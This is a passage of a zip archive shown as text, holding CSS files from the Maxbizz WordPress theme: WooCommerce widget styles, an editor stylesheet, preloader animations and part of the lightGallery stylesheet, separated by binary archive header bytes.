  margin-left: 0;
  margin-right: 20px;
  border: 1px solid #dbdbdb;
  -webkit-border-radius: 5px;
  -moz-border-radius: 5px;
  border-radius: 5px;
}
.woocommerce .site ul.product_list_widget li a:not(.remove) {
  display: block;
  font-family: "Inter", sans-serif;
  font-size: 15px;
  color: #1a1b1e;
  font-weight: 600;
  line-height: 22px;
}
.woocommerce .site ul.product_list_widget li a:not(.remove):hover {
  color: #fe8423;
}
.woocommerce .site ul.product_list_widget li .star-rating {
  float: none;
  margin-top: 5px;
  margin-bottom: 3px;
  font-size: 12px;
}
.woocommerce .site ul.product_list_widget li .price {
  font-size: 14px;
  line-height: 28px;
  display: inline-block;
}
.woocommerce .site ul.product_list_widget li .price del {
  color: #636363;
  margin-right: 5px;
}
.woocommerce .site ul.product_list_widget li .price del span {
  color: #636363;
  text-decoration: line-through;
}
.woocommerce .site ul.product_list_widget li .price ins {
  background: transparent;
}

/* widget cart */
.woocommerce .widget_shopping_cart .cart_list .quantity {
  color: #707f96;
  font-family: "Inter", sans-serif;
  font-weight: 500;
  font-size: 14px;
}

.woocommerce .widget_shopping_cart ul.cart_list li,
.woocommerce.widget_shopping_cart ul.cart_list li {
  position: relative;
  display: block;
  padding: 0 2em 20px 0;
  margin-bottom: 0;
}
.woocommerce .widget_shopping_cart ul.cart_list li img,
.woocommerce.widget_shopping_cart ul.cart_list li img {
  width: 70px;
}
.woocommerce .widget_shopping_cart ul.cart_list li a.remove,
.woocommerce.widget_shopping_cart ul.cart_list li a.remove {
  top: 0%;
  margin-top: 0px;
  right: 0px;
  left: auto;
  font-weight: 500;
  font-size: 1.3em;
}

.woocommerce .widget_shopping_cart .total,
.woocommerce.widget_shopping_cart .total {
  border-top: 0;
  padding: 0;
  margin-bottom: 20px;
}
.woocommerce .widget_shopping_cart .total strong,
.woocommerce.widget_shopping_cart .total strong {
  color: #1a1b1e;
  font-family: "Inter", sans-serif;
  font-weight: 600;
}
.woocommerce .widget_shopping_cart .total .woocommerce-Price-amount,
.woocommerce.widget_shopping_cart .total .woocommerce-Price-amount {
  float: right;
  font-family: "Inter", sans-serif;
  font-weight: 600;
  font-size: 16px;
}

.woocommerce-mini-cart__buttons {
  margin: 0 -2%;
}

.woocommerce-mini-cart__buttons a.button.wc-forward {
  color: #fff;
  font-family: "Inter", sans-serif;
  font-size: 13px;
  font-weight: 600;
  border-radius: 0;
  background-color: #fe8423;
  text-transform: uppercase;
  padding: 17px 10px;
  min-width: 46%;
  margin: 0 2%;
  text-align: center;
  float: left;
  -webkit-border-radius: 3px;
  -moz-border-radius: 3px;
  border-radius: 3px;
}
.woocommerce-mini-cart__buttons a.button.wc-forward:hover {
  background: #fe8423;
}
.woocommerce-mini-cart__buttons a.button.checkout {
  background-color: #1b1d21;
  color: #fff;
}

/* widget filter */
.woocommerce .woocommerce-widget-layered-nav-list {
  font-family: "Inter", sans-serif;
  font-weight: 700;
  font-size: 14px;
  position: relative;
  margin-bottom: 11px;
  line-height: 24px;
}
.woocommerce .woocommerce-widget-layered-nav-list li {
  margin-bottom: 5px;
}
.woocommerce .woocommerce-widget-layered-nav-list li a {
  color: #1a1b1e;
}
.woocommerce .woocommerce-widget-layered-nav-list li a:hover {
  color: #fe8423;
}
.woocommerce .woocommerce-widget-layered-nav-list li span.count {
  color: #666666;
}

.woocommerce .widget_price_filter .price_slider_wrapper .ui-widget-content {
  background-color: #efefef;
  height: 5px;
}
.woocommerce .widget_price_filter .ui-slider {
  margin-left: 0px;
  margin-right: 0px;
  margin-bottom: 25px;
}
.woocommerce .widget_price_filter .ui-slider .ui-slider-range, .woocommerce .widget_price_filter .ui-slider .ui-slider-handle {
  background-color: #1b1d21;
}
.woocommerce .widget_price_filter .ui-slider .ui-slider-handle {
  width: 12px;
  height: 12px;
  top: -4px;
}
.woocommerce .widget_price_filter .price_slider_amount {
  font-family: "Inter", sans-serif;
  font-size: 14px;
  letter-spacing: 1px;
  color: #1a1b1e;
  font-weight: 700;
  text-transform: uppercase;
}
.woocommerce .widget_price_filter .price_slider_amount span {
  color: #636363;
}
.woocommerce .widget_price_filter .price_slider_amount button.button {
  padding: 0;
  font-family: "Inter", sans-serif;
  font-size: 14px;
  letter-spacing: 0.5px;
  background: none;
  color: #fe8423;
  box-shadow: none;
  text-transform: uppercase;
}
.woocommerce .widget_price_filter .price_slider_amount .price_label {
  line-height: 1;
}

.product_meta > span {
  display: block;
  color: #1a1b1e;
  font-size: 16px;
  font-family: "Inter", sans-serif;
  font-weight: 600;
  letter-spacing: 0.5px;
  margin-bottom: 15px;
}
.product_meta > span > * {
  font-weight: 500;
  text-transform: none;
  color: #636363;
}

.woocommerce-review-link {
  color: #666666;
  font-size: 16px;
  font-weight: 600;
  display: inline-block;
  margin-left: 10px;
  margin-top: 3px;
}

.woocommerce div.product p.price,
.woocommerce div.product span.price {
  color: #fe8423;
}

.woocommerce div.product .entry-summary p.price,
.woocommerce div.product .entry-summary span.price {
  font-size: 26px;
  font-family: "Inter", sans-serif;
}
.woocommerce div.product .entry-summary p.price .woocommerce-Price-amount,
.woocommerce div.product .entry-summary span.price .woocommerce-Price-amount {
  font-weight: 700;
}

.woocommerce-mini-cart__empty-message {
  margin-bottom: 0px;
}

PK�8FZ�w��%�%css/editor-style.cssnu�[���/*
Theme Name: Maxbizz
Description: Used to style the TinyMCE editor.
*/


/**
 * Table of Contents:
 *
 * 1.0 - Body
 * 2.0 - Typography
 * 3.0 - Elements
 * 4.0 - Alignment
 * 5.0 - Caption
 * 6.0 - Galleries
 * 7.0 - Media Elements
 * 8.0 - RTL
 */

/**
 * 1.0 - Body
 */

body {
	background-color: #fff;
	color: #333;
}

/**
 * 2.0 - Typography
 */

body,
button,
input,
select,
textarea {
	font-family: "Libre Franklin", "Helvetica Neue", helvetica, arial, sans-serif;
	font-size: 16px;
	font-weight: 400;
	line-height: 1.66;
}

h1,
h2,
h3,
h4,
h5,
h6 {
	clear: both;
	line-height: 1.4;
	margin: 0 0 0.75em;
	padding: 1.5em 0 0;
}

h1:first-child,
h2:first-child,
h3:first-child,
h4:first-child,
h5:first-child,
h6:first-child {
	padding-top: 0;
}

h1 {
	font-size: 24px;
	font-size: 1.5rem;
	font-weight: 300;
}

h2 {
	color: #666;
	font-size: 20px;
	font-size: 1.25rem;
	font-weight: 300;
}

h3 {
	color: #333;
	font-size: 18px;
	font-size: 1.125rem;
	font-weight: 300;
}

h4 {
	color: #333;
	font-size: 16px;
	font-size: 1rem;
	font-weight: 800;
}

h5 {
	color: #767676;
	font-size: 13px;
	font-size: 0.8125rem;
	font-weight: 800;
	letter-spacing: 0.15em;
	text-transform: uppercase;
}

h6 {
	color: #333;
	font-size: 15px;
	font-size: 0.9375rem;
	font-weight: 800;
}

p {
	margin: 0 0 1.5em;
	padding: 0;
}

dfn,
cite,
em,
i {
	font-style: italic;
}

blockquote {
	color: #666;
	font-size: 18px;
	font-size: 1.125rem;
	font-style: italic;
	line-height: 1.7;
	margin: 0;
	overflow: hidden;
	padding: 0;
}

blockquote.alignleft,
blockquote.alignright {
	font-size: 14px;
	font-size: 0.875rem;
	width: 34%;
}

address {
	margin: 0 0 1.5em;
}

pre {
	background: #eee;
	font-family: "Courier 10 Pitch", Courier, monospace;
	font-size: 15px;
	font-size: 0.9375rem;
	line-height: 1.6;
	margin-bottom: 1.6em;
	max-width: 100%;
	overflow: auto;
	padding: 1.6em;
}

code,
kbd,
tt,
var {
	font-family: Monaco, Consolas, "Andale Mono", "DejaVu Sans Mono", monospace;
	font-size: 15px;
	font-size: 0.9375rem;
}

abbr,
acronym {
	border-bottom: 1px dotted #666;
	cursor: help;
}

mark,
ins {
	background: #eee;
	text-decoration: none;
}

big {
	font-size: 125%;
}

blockquote,
q {
	quotes: "" "";
}

blockquote:before,
blockquote:after,
q:before,
q:after {
	content: "";
}

/* Typography for Thai Font */

html[lang="th"] h1,
html[lang="th"] h2,
html[lang="th"] h3,
html[lang="th"] h4,
html[lang="th"] h5,
html[lang="th"] h6 {
	letter-spacing: 0;
	line-height: 1.65;
}

html[lang="th"] body,
html[lang="th"] button,
html[lang="th"] input,
html[lang="th"] select,
html[lang="th"] textarea {
	line-height: 1.8;
}

/**
 * 3.0 - Elements
 */

hr {
	background-color: #bbb;
	border: 0;
	height: 1px;
	margin-bottom: 1.5em;
}

ul,
ol {
	margin: 0 0 1.5em;
	padding: 0;
}

ul {
	list-style: disc;
}

ol {
	counter-reset: item;
}

ol > li {
	display: block;
	position: relative;
}

ol > li:before {
	content: counter(item);
	counter-increment: item;
	font-weight: 800;
	left: -1.5em;
	position: absolute;
}

li > ul,
li > ol {
	margin-bottom: 0;
	margin-left: 1.5em;
}

dt {
	font-weight: 700;
}

dd {
	margin: 0 1.5em 1.5em;
}

table {
	border-collapse: collapse;
	margin: 0 0 1.5em;
	width: 100%;
}

thead th {
	border-bottom: 2px solid #bbb;
	padding-bottom: 0.5em;
}

th {
	padding: 0.4em;
	text-align: left;
}

tr {
	border-bottom: 1px solid #eee;
}

td {
	padding: 0.4em;
}

th:first-child,
td:first-child {
	padding-left: 0;
}

th:last-child,
td:last-child {
	padding-right: 0;
}

a {
	-webkit-box-shadow: inset 0 -1px 0 rgba(15, 15, 15, 1);
	box-shadow: inset 0 -1px 0 rgba(15, 15, 15, 1);
	color: #222;
	text-decoration: none;
	-webkit-transition: color 80ms ease-in, -webkit-box-shadow 130ms ease-in-out;
	transition: color 80ms ease-in, -webkit-box-shadow 130ms ease-in-out;
	transition: color 80ms ease-in, box-shadow 130ms ease-in-out;
	transition: color 80ms ease-in, box-shadow 130ms ease-in-out, -webkit-box-shadow 130ms ease-in-out;
}

a:focus {
	outline: thin dotted;
}

a:hover,
a:focus {
	color: #000;
	-webkit-box-shadow: inset 0 0 0 rgba(0, 0, 0, 0), 0 3px 0 rgba(0, 0, 0, 1);
	box-shadow: inset 0 0 0 rgba(0, 0, 0, 0), 0 3px 0 rgba(0, 0, 0, 1);
}

/* Fixes linked images */

a img {
	background: #fff;
	-webkit-box-shadow: 0 0 0 6px #fff;
	box-shadow: 0 0 0 6px #fff;
}

/**
 * 4.0 - Alignment
 */

img {
	height: auto; /* Make sure images are scaled correctly. */
	width: inherit;  /* Make images fill their parent's space. Solves IE8. */
	max-width: 100%; /* Adhere to container width. */
}

embed,
iframe,
object {
	margin-bottom: 1.5em;
	max-width: 100%;
}

/**
 * 5.0 - Caption
 */

.wp-caption {
	color: #666;
	font-size: 13px;
	font-size: 0.8125rem;
	font-style: italic;
	margin-bottom: 1.5em;
	max-width: 100%;
}

.wp-caption img[class*="wp-image-"] {
	display: block;
	margin-left: auto;
	margin-right: auto;
}

.wp-caption .wp-caption-text {
	margin: 0.8075em 0;
}

/**
 * 6.0 - Galleries
 */

.gallery {
	margin-bottom: 1.5em;
}

.gallery-item {
	display: inline-block;
	text-align: center;
	vertical-align: top;
	width: 100%;
}

.gallery-item a,
.gallery-item a:hover,
.gallery-item a:focus {
	-webkit-box-shadow: none;
	box-shadow: none;
	background: none;
	display: inline-block;
}

.gallery-columns-2 .gallery-item {
	max-width: 50%;
}

.gallery-columns-3 .gallery-item {
	max-width: 33.33%;
}

.gallery-columns-4 .gallery-item {
	max-width: 25%;
}

.gallery-columns-5 .gallery-item {
	max-width: 20%;
}

.gallery-columns-6 .gallery-item {
	max-width: 16.66%;
}

.gallery-columns-7 .gallery-item {
	max-width: 14.28%;
}

.gallery-columns-8 .gallery-item {
	max-width: 12.5%;
}

.gallery-columns-9 .gallery-item {
	max-width: 11.11%;
}

.gallery-caption {
	display: block;
}

/**
 * 7.0 - Media Elements
 */

.mejs-container {
	margin-bottom: 1.5em;
}

/* Audio Player */

.mejs-controls a.mejs-horizontal-volume-slider,
.mejs-controls a.mejs-horizontal-volume-slider:focus,
.mejs-controls a.mejs-horizontal-volume-slider:hover {
	background: transparent;
	border: 0;
}

/* Playlist Color Overrides: Light */

.wp-playlist-light {
	border-color: #eee;
	color: #222;
}

.wp-playlist-light .wp-playlist-current-item .wp-playlist-item-album {
	color: #333;
}

.wp-playlist-light .wp-playlist-current-item .wp-playlist-item-artist {
	color: #767676;
}

.wp-playlist-light .wp-playlist-item {
	border-bottom: 1px dotted #eee;
	-webkit-transition: background-color 0.2s ease-in-out, border-color 0.2s ease-in-out, color 0.3s ease-in-out;
	transition: background-color 0.2s ease-in-out, border-color 0.2s ease-in-out, color 0.3s ease-in-out;
}

.wp-playlist-light .wp-playlist-item:hover,
.wp-playlist-light .wp-playlist-item:focus {
	border-bottom-color: rgba(0, 0, 0, 0);
	background-color: #767676;
	color: #fff;
}

.wp-playlist-light a.wp-playlist-caption:hover,
.wp-playlist-light .wp-playlist-item:hover a,
.wp-playlist-light .wp-playlist-item:focus a {
	color: #fff;
}

/* Playlist Color Overrides: Dark */

.wp-playlist-dark {
	background: #222;
	border-color: #333;
}

.wp-playlist-dark .mejs-container .mejs-controls {
	background-color: #333;
}

.wp-playlist-dark .wp-playlist-caption {
	color: #fff;
}

.wp-playlist-dark .wp-playlist-current-item .wp-playlist-item-album {
	color: #eee;
}

.wp-playlist-dark .wp-playlist-current-item .wp-playlist-item-artist {
	color: #aaa;
}

.wp-playlist-dark .wp-playlist-playing {
	background-color: #333;
}

.wp-playlist-dark .wp-playlist-item {
	border-bottom: 1px dotted #555;
	-webkit-transition: background-color 0.2s ease-in-out, border-color 0.2s ease-in-out, color 0.3s ease-in-out;
	transition: background-color 0.2s ease-in-out, border-color 0.2s ease-in-out, color 0.3s ease-in-out;
}

.wp-playlist-dark .wp-playlist-item:hover,
.wp-playlist-dark .wp-playlist-item:focus {
	border-bottom-color: rgba(0, 0, 0, 0);
	background-color: #aaa;
	color: #222;
}

.wp-playlist-dark a.wp-playlist-caption:hover,
.wp-playlist-dark .wp-playlist-item:hover a,
.wp-playlist-dark .wp-playlist-item:focus a {
	color: #222;
}

/* Playlist Style Overrides */

.wp-playlist {
	padding: 0.625em 0.625em 0.3125em;
}

.wp-playlist-current-item .wp-playlist-item-title {
	font-weight: 700;
}

.wp-playlist-current-item .wp-playlist-item-album {
	font-style: normal;
}

.wp-playlist-current-item .wp-playlist-item-artist {
	font-size: 10px;
	font-size: 0.625rem;
	font-weight: 800;
	letter-spacing: 0.1818em;
	text-transform: uppercase;
}

.wp-playlist-item {
	padding: 0 0.3125em;
	cursor: pointer;
}

.wp-playlist-item:last-of-type {
	border-bottom: none;
}

.wp-playlist-item a {
	padding: 0.3125em 0;
	border-bottom: none;
}

.wp-playlist-item a,
.wp-playlist-item a:focus,
.wp-playlist-item a:hover {
	-webkit-box-shadow: none;
	box-shadow: none;
	background: transparent;
}

.wp-playlist-item-length {
	top: 5px;
}

/**
 * 8.0 - RTL
 */

.rtl th {
	text-align: right;
}

.rtl ol {
	counter-reset: item;
}

.rtl ol > li:before {
	left: auto;
	right: -1.5em;
}

.rtl li > ul,
.rtl li > ol {
	margin-left: 0;
	margin-right: 1.5em;
}

.rtl .mejs-offscreen {
	right: -10000px;
}
PK�8FZ+����css/royal-preload.cssnu�[���body.royal_preloader {
    background: none;
    visibility: hidden;    
}
#royal_preloader {
    visibility: visible;
    position: fixed;
    width:100%;
    height:100%;
    top: 0;
    right: 0;
    bottom: 0;
    left: 0;
    height: auto;
    margin: 0;
    z-index: 9999999999;
}
#royal_preloader.royal_preloader_number:before,
#royal_preloader.royal_preloader_progress:before {
    content: '';
    position: absolute;
    top: 0;
    right: 0;
    bottom: 0;
    left: 0;
    background-image: -webkit-radial-gradient(circle, rgba(255, 255, 255, 0.1), rgba(255, 255, 255, 0.01));
    background-image: -moz-radial-gradient(circle, rgba(255, 255, 255, 0.1), rgba(255, 255, 255, 0.01));
    background-image: -ms-radial-gradient(circle, rgba(255, 255, 255, 0.1), rgba(255, 255, 255, 0.01));
    background-image: -o-radial-gradient(circle, rgba(255, 255, 255, 0.1), rgba(255, 255, 255, 0.01));
    background-image: radial-gradient(circle, rgba(255, 255, 255, 0.1), rgba(255, 255, 255, 0.01));
}
#royal_preloader.complete {
    opacity: 0;
    -webkit-transition: opacity 0.2s linear 0.5s;
       -moz-transition: opacity 0.2s linear 0.5s;
        -ms-transition: opacity 0.2s linear 0.5s;
         -o-transition: opacity 0.2s linear 0.5s;
            transition: opacity 0.2s linear 0.5s;
}
#royal_preloader.royal_preloader_line {
    height: 2px;
    bottom: auto;
}

/* Number Mode */
#royal_preloader.royal_preloader_number .royal_preloader_percentage {
    position: absolute;
    top: 0;
    right: 0;
    bottom: 0;
    left: 0;
    margin: auto;
    width: 100px;
    height: 100px;
    border-width: 1px;
    border-style: solid;
    border-radius: 50%;
    line-height: 100px;
    font-size: 20px;
    font-family: Impact, Arial;
    text-shadow: 1px 1px 2px rgba(0, 0, 0, 0.1);
    text-align: center;
}
#royal_preloader.royal_preloader_number .royal_preloader_percentage > div {
    position: absolute;
    top: -2px;
    right: -2px;
    bottom: -2px;
    left: -2px;
    border: 4px solid transparent;
    border-left-color: #FFFFFF;
    border-radius: 50%;
    -webkit-animation: rotate 0.8s linear infinite;
       -moz-animation: rotate 0.8s linear infinite;
        -ms-animation: rotate 0.8s linear infinite;
         -o-animation: rotate 0.8s linear infinite;
            animation: rotate 0.8s linear infinite;
}

/* Line Mode */
#royal_preloader.royal_preloader_line .royal_preloader_loader {
    position: absolute;
    height: 100%;
    left: 0;
}
#royal_preloader.royal_preloader_line .royal_preloader_peg {
    position: absolute;
    right: 0;
    height: 100%;
    width: 100px;
    opacity: 0.5;
}

/* Text Mode */
#royal_preloader.royal_preloader_text .royal_preloader_loader {
    color: #000;
    position: absolute;
    top: 0;
    bottom: 0;
    left: 50%;
    font-family: 'Titillium Web', Arial, sans-serif;
    font-weight: 300;
    height: 80px;
    line-height: 80px;
    margin: auto;
    letter-spacing: 2px;
    font-size: 25px;
    white-space: nowrap;
}
#royal_preloader.royal_preloader_text .royal_preloader_loader div {
    position: absolute;
    top: 0px;
    right: 0px;
    bottom: 0px;
    left: 0%;
    background-color: #000000;
    opacity: 0.7;
    filter: alpha(opacity=70);
}

/* Scale Text Mode */
#royal_preloader.royal_preloader_scale_text .royal_preloader_loader {
    color: #FFFFFF;
    position: absolute;
    font-family: 'Open Sans', sans-serif;
    font-weight:700;
    top: 0;
    bottom: 0;
    left: 50%;
    height: 32px;
    line-height: 32px;
    margin: auto;
    letter-spacing: 1px;
    font-size: 32px;
    white-space: nowrap;
}

#royal_preloader.royal_preloader_scale_text .royal_preloader_loader span {
    display: inline-block;
    -webkit-transform: scale(0);
       -moz-transform: scale(0);
        -ms-transform: scale(0);
         -o-transform: scale(0);
            transform: scale(0);
}

#royal_preloader.royal_preloader_scale_text .royal_preloader_loader span.loaded {
    -webkit-animation: scale 0.2s forwards;
       -moz-animation: scale 0.2s forwards;
        -ms-animation: scale 0.2s forwards;
         -o-animation: scale 0.2s forwards;
            animation: scale 0.2s forwards;
}

/* Logo Mode */
#royal_preloader.royal_preloader_logo .royal_preloader_loader {
    position: absolute;
    left: 50%;
    top: 50%;
    margin: 0px;
    overflow: hidden;
    background-position: 50% 50%;
    background-repeat: no-repeat;
    background-size: 100%;
    border-radius: 5px;
}
#royal_preloader.royal_preloader_logo .royal_preloader_loader div {
    position: absolute;
    bottom: 0%;
    left: 0px;
    right: 0px;
    height: 100%;
    opacity: 0.7;
    filter: alpha(opacity=70);
}
#royal_preloader.royal_preloader_logo .royal_preloader_percentage {
    position: absolute;
    top: 50%;
    left: 50%;
    height: 40px;
    line-height: 40px;
    margin: 0px;
    color: #072E77;
    text-align: center;
    font-family: 'Open Sans';
    font-size: 13px;
    font-weight: 400;
    letter-spacing:2px;
    padding-top:10px;
}

/* Progress Mode */
#royal_preloader.royal_preloader_progress .royal_preloader_percentage {
    position: absolute;
    top: 50%;
    left: 0;
    right: 0;
    color: #AAAAAA;
    color: rgba(255, 255, 255, 0.5);
    font-family: Impact, Arial;
    font-size: 20px;
    text-align: center;
}
#royal_preloader.royal_preloader_progress .royal_preloader_loader {
    content: '';
    position: absolute;
    top: 50%;
    left: 0;
    right: 0;
    width: 60%;
    height: 1px;
    margin: -10px auto auto auto;
    background-color: rgba(0, 0, 0, 0.2); 
}
#royal_preloader.royal_preloader_progress .royal_preloader_meter {
    width: 0;
    height: 100%;
    margin: auto;
    padding: 0;
    background-color: #fff;
}


@-webkit-keyframes rotate {
    0% { -webkit-transform: rotate(0);}
    100% { -webkit-transform: rotate(360deg); }
}
@-moz-keyframes rotate {
    0% { -moz-transform: rotate(0); }
    100% { -moz-transform: rotate(360deg); }
}
@-ms-keyframes rotate {
    0% { -ms-transform: rotate(0); }
    100% { -ms-transform: rotate(360deg); }
}
@-o-keyframes rotate {
    0% { -o-transform: rotate(0); }
    100% { -o-transform: rotate(360deg); }
}
@keyframes rotate {
    0% { transform: rotate(0); }
    100% { transform: rotate(360deg); }
}

@-webkit-keyframes scale {
    0% { -webkit-transform: scale(0); opacity: 0;}
    50% { -webkit-transform: scale(2);  opacity: 0.5;}
    100% { -webkit-transform: scale(1);  opacity: 1;}
}
@-moz-keyframes scale {
    0% { -moz-transform: scale(0); opacity: 0;}
    50% { -moz-transform: scale(2); opacity: 0.5;}
    100% { -moz-transform: scale(1); opacity: 1;}
}
@-ms-keyframes scale {
    0% { -ms-transform: scale(0); opacity: 0;}
    50% { -ms-transform: scale(2); opacity: 0.5;}
    100% { -ms-transform: scale(1); opacity: 1;}
}
@-o-keyframes scale {
    0% { -o-transform: scale(0); opacity: 0;}
    50% { -o-transform: scale(2); opacity: 0.5;}
    100% { -o-transform: scale(1); opacity: 1;}
}
@keyframes scale {
    0% { transform: scale(0); opacity: 0;}
    50% { transform: scale(2); opacity: 0.5;}
    100% { transform: scale(1); opacity: 1;}
}
@media only screen and (max-width: 800px) {
    #royal_preloader.royal_preloader_scale_text .royal_preloader_loader {
        height: 22px;
        line-height: 22px;
        font-size: 22px;
    }
}PK�8FZrO�E�d�dcss/lightgallery.cssnu�[���/*! lightgallery - v1.7.0 - 2020-05-03
* http://sachinchoolur.github.io/lightGallery/
* Copyright (c) 2020 Sachin N; Licensed GPLv3 */
@font-face {
  font-family: 'lg';
  src: url("../fonts/lg.eot?n1z373");
  src: url("../fonts/lg.eot?#iefixn1z373") format("embedded-opentype"), url("../fonts/lg.woff?n1z373") format("woff"), url("../fonts/lg.ttf?n1z373") format("truetype"), url("../fonts/lg.svg?n1z373#lg") format("svg");
  font-weight: normal;
  font-style: normal;
}
.lg-icon {
  font-family: 'lg';
  font-style: normal;
  font-weight: normal;
  font-variant: normal;
  text-transform: none;
  line-height: 1;
  /* Better Font Rendering =========== */
  -webkit-font-smoothing: antialiased;
  -moz-osx-font-smoothing: grayscale;
}

.lg-actions .lg-next, .lg-actions .lg-prev {
  background-color: rgba(0, 0, 0, 0.45);
  border-radius: 2px;
  color: #999;
  cursor: pointer;
  display: block;
  font-size: 22px;
  margin-top: -10px;
  padding: 8px 10px 9px;
  position: absolute;
  top: 50%;
  z-index: 1080;
  border: none;
  outline: none;
}
.lg-actions .lg-next.disabled, .lg-actions .lg-prev.disabled {
  pointer-events: none;
  opacity: 0.5;
}
.lg-actions .lg-next:hover, .lg-actions .lg-prev:hover {
  color: #FFF;
}
.lg-actions .lg-next {
  right: 20px;
}
.lg-actions .lg-next:before {
  content: "\e095";
}
.lg-actions .lg-prev {
  left: 20px;
}
.lg-actions .lg-prev:after {
  content: "\e094";
}

@-webkit-keyframes lg-right-end {
  0% {
    left: 0;
  }
  50% {
    left: -30px;
  }
  100% {
    left: 0;
  }
}
@-moz-keyframes lg-right-end {
  0% {
    left: 0;
  }
  50% {
    left: -30px;
  }
  100% {
    left: 0;
  }
}
@-ms-keyframes lg-right-end {
  0% {
    left: 0;
  }
  50% {
    left: -30px;
  }
  100% {
    left: 0;
  }
}
@keyframes lg-right-end {
  0% {
    left: 0;
  }
  50% {
    left: -30px;
  }
  100% {
    left: 0;
  }
}
@-webkit-keyframes lg-left-end {
  0% {
    left: 0;
  }
  50% {
    left: 30px;
  }
  100% {
    left: 0;
  }
}
@-moz-keyframes lg-left-end {
  0% {
    left: 0;
  }
  50% {
    left: 30px;
  }
  100% {
    left: 0;
  }
}
@-ms-keyframes lg-left-end {
  0% {
    left: 0;
  }
  50% {
    left: 30px;
  }
  100% {
    left: 0;
  }
}
@keyframes lg-left-end {
  0% {
    left: 0;
  }
  50% {
    left: 30px;
  }
  100% {
    left: 0;
  }
}
.lg-outer.lg-right-end .lg-object {
  -webkit-animation: lg-right-end 0.3s;
  -o-animation: lg-right-end 0.3s;
  animation: lg-right-end 0.3s;
  position: relative;
}
.lg-outer.lg-left-end .lg-object {
  -webkit-animation: lg-left-end 0.3s;
  -o-animation: lg-left-end 0.3s;
  animation: lg-left-end 0.3s;
  position: relative;
}

.lg-toolbar {
  z-index: 1082;
  left: 0;
  position: absolute;
  top: 0;
  width: 100%;
  background-color: rgba(0, 0, 0, 0.45);
}
.lg-toolbar .lg-icon {
  color: #999;
  cursor: pointer;
  float: right;
  font-size: 24px;
  height: 47px;
  line-height: 27px;
  padding: 10px 0;
  text-align: center;
  width: 50px;
  text-decoration: none !important;
  outline: medium none;
  background: none;
  border: none;
  box-shadow: none;
  -webkit-transition: color 0.2s linear;
  -o-transition: color 0.2s linear;
  transition: color 0.2s linear;
}
.lg-toolbar .lg-icon:hover {
  color: #FFF;
}
.lg-toolbar .lg-close:after {
  content: "\e070";
}
.lg-toolbar .lg-download:after {
  content: "\e0f2";
}

.lg-sub-html {
  bottom: 0;
  color: #EEE;
  font-size: 16px;
  left: 0;
  padding: 15px 40px;
  position: fixed;
  right: 0;
  text-align: center;
  z-index: 1080;
}
.lg-sub-html h4 {
  margin: 0;
  font-size: 13px;
  font-weight: bold;
}
.lg-sub-html p {
  font-size: 12px;
  margin: 5px 0 0;
}

#lg-counter {
  color: #999;
  display: inline-block;
  font-size: 16px;
  padding-left: 20px;
  padding-top: 12px;
  vertical-align: middle;
}

.lg-toolbar, .lg-prev, .lg-next {
  opacity: 1;
  -webkit-transition: -webkit-transform 0.35s cubic-bezier(0, 0, 0.25, 1) 0s, opacity 0.35s cubic-bezier(0, 0, 0.25, 1) 0s, color 0.2s linear;
  -moz-transition: -moz-transform 0.35s cubic-bezier(0, 0, 0.25, 1) 0s, opacity 0.35s cubic-bezier(0, 0, 0.25, 1) 0s, color 0.2s linear;
  -o-transition: -o-transform 0.35s cubic-bezier(0, 0, 0.25, 1) 0s, opacity 0.35s cubic-bezier(0, 0, 0.25, 1) 0s, color 0.2s linear;
  transition: transform 0.35s cubic-bezier(0, 0, 0.25, 1) 0s, opacity 0.35s cubic-bezier(0, 0, 0.25, 1) 0s, color 0.2s linear;
}

.lg-hide-items .lg-prev {
  opacity: 0;
  -webkit-transform: translate3d(-10px, 0, 0);
  transform: translate3d(-10px, 0, 0);
}
.lg-hide-items .lg-next {
  opacity: 0;
  -webkit-transform: translate3d(10px, 0, 0);
  transform: translate3d(10px, 0, 0);
}
.lg-hide-items .lg-toolbar {
  opacity: 0;
  -webkit-transform: translate3d(0, -10px, 0);
  transform: translate3d(0, -10px, 0);
}

body:not(.lg-from-hash) .lg-outer.lg-start-zoom .lg-object {
  -webkit-transform: scale3d(0.5, 0.5, 0.5);
  transform: scale3d(0.5, 0.5, 0.5);
  opacity: 0;
  -webkit-transition: -webkit-transform 250ms cubic-bezier(0, 0, 0.25, 1) 0s, opacity 250ms cubic-bezier(0, 0, 0.25, 1) !important;
  -moz-transition: -moz-transform 250ms cubic-bezier(0, 0, 0.25, 1) 0s, opacity 250ms cubic-bezier(0, 0, 0.25, 1) !important;
  -o-transition: -o-transform 250ms cubic-bezier(0, 0, 0.25, 1) 0s, opacity 250ms cubic-bezier(0, 0, 0.25, 1) !important;
  transition: transform 250ms cubic-bezier(0, 0, 0.25, 1) 0s, opacity 250ms cubic-bezier(0, 0, 0.25, 1) !important;
  -webkit-transform-origin: 50% 50%;
  -moz-transform-origin: 50% 50%;
  -ms-transform-origin: 50% 50%;
  transform-origin: 50% 50%;
}
body:not(.lg-from-hash) .lg-outer.lg-start-zoom .lg-item.lg-complete .lg-object {
  -webkit-transform: scale3d(1, 1, 1);
  transform: scale3d(1, 1, 1);
  opacity: 1;
}

.lg-outer .lg-thumb-outer {
  background-color: #0D0A0A;
  bottom: 0;
  position: absolute;
  width: 100%;
  z-index: 1080;
  max-height: 350px;
  -webkit-transform: translate3d(0, 100%, 0);
  transform: translate3d(0, 100%, 0);
  -webkit-transition: -webkit-transform 0.25s cubic-bezier(0, 0, 0.25, 1) 0s;
  -moz-transition: -moz-transform 0.25s cubic-bezier(0, 0, 0.25, 1) 0s;
  -o-transition: -o-transform 0.25s cubic-bezier(0, 0, 0.25, 1) 0s;
  transition: transform 0.25s cubic-bezier(0, 0, 0.25, 1) 0s;
}
.lg-outer .lg-thumb-outer.lg-grab .lg-thumb-item {
  cursor: -webkit-grab;
  cursor: -moz-grab;
  cursor: -o-grab;
  cursor: -ms-grab;
  cursor: grab;
}
.lg-outer .lg-thumb-outer.lg-grabbing .lg-thumb-item {
  cursor: move;
  cursor: -webkit-grabbing;
  cursor: -moz-grabbing;
  cursor: -o-grabbing;
  cursor: -ms-grabbing;
  cursor: grabbing;
}
.lg-outer .lg-thumb-outer.lg-dragging .lg-thumb {
  -webkit-transition-duration: 0s !important;
  transition-duration: 0s !important;
}
.lg-outer.lg-thumb-open .lg-thumb-outer {
  -webkit-transform: translate3d(0, 0%, 0);
  transform: translate3d(0, 0%, 0);
}
.lg-outer .lg-thumb {
  padding: 10px 0;
  height: 100%;
  margin: auto;
  margin-bottom: -5px;
}
.lg-outer .lg-thumb-item {
  cursor: pointer;
  float: left;
  overflow: hidden;
  height: 100%;
  border: 2px solid #FFF;
